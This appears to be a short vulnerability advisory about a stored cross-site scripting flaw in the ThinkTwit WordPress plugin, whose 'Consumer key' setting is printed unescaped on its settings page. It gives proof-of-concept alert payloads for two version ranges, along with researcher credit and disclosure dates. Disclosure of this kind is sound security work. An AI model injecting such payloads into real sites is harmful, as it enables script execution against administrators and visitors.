The plugin did not sanitise or escape its "Consumer key" setting before outputting it its settings page, leading to a Stored Cross-Site Scripting issue.
Put the following payload in the "Consumer key" setting of the plugin (/wp-admin/options-general.php?page=thinktwit): - v < 1.6.7 : "><script>alert(/XSS/)</script> - v < 1.7.1 : " style=animation-name:rotation onanimationstart=alert(/XSS/)//
Vinit Yashwantrao
Vinit Yashwantrao
Yes
2021-08-18 (about 9 months ago)
2021-08-18 (about 9 months ago)
2022-04-09 (about 1 months ago)